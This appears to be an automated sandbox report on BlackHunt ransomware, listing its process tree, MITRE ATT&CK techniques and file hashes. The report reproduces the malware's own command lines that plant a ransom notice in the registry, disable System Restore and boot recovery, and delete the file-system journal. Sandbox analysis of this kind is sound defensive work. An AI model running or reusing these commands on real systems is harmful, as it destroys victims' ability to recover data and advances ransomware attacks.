C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:16024
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:11680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:16012
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:16312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:15924
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4836
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:1092
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8508
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:11372
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:15724
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:16636
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:6440
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5908
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:16660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 10600 -ip 106001⤵PID:6516
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a8adbc162d806646e24131c20daf49b0
SHA15ecde59d63c3bf141d27d6171520b8236e35619d
SHA256dc20dc0db7ddcd047d6943db1f7563c43cf4d42cde9435c323efbb4d743d4be8
SHA512dffb3e21b3e7cb22957ee0ee01812f241edcbf151b16790f3e5f06e9cc65837fb06f0ed5729a21cf940dd20032bdf5b569336f8f227a2d0a882c0cb7af450efe
-
Filesize
12KB
MD5e7ef462f494df2b92e9186ee19e7e448
SHA1404e5394f3981e079a05c0f7e7691a9e481f4061
SHA256aa5ec698c2cf10353f001f812c5224dea9b60c5d13ab98ee7b497f3399ad9555
SHA5126a2dfe3d315b89828b0d7c4aeaaaf98fc64cb6946e0f66ba023bd47303ed1f1c956249261ef2fb38f1851b51715183a45a6f1f3f2e5f9b62ee4710754bdc8b17
-
Filesize
12KB
MD5b0a1c752a67cfefc872fc085ea96385e
SHA13fe5bc949e87a0543d2d7c784ad584d3ffe72bbc
SHA256df7bec19dc2822f6ad10f7dff9dbd206af10bda729fcfe7baff1babebfb37e06
SHA512ff9cf13e2d0c92d34e846040a0e5a048b27b9eb4fb531b08d09461a285dce91d612795f48e83b9a987763805d1c75b2f43377f9ca424df7a3ffd198bcc2f7e5c
-
Filesize
684B
MD508edf5202d189ac347170e69d79e4a48
SHA10590a7c6a922d3d8eebe819b58cd15b2804624e8
SHA256266d1fe738c804ccfa078dd2fd7018f248057f619e32513e2fb9e8d0625278f9
SHA512091b81bd8a37921312d853e47dc8a12cd4e831d3e7f521f25e43d86e584ccf2cc7cd7f8523b21f4f9e9db2b27bca22c1a4c138fd9ca18704125612885fdb6419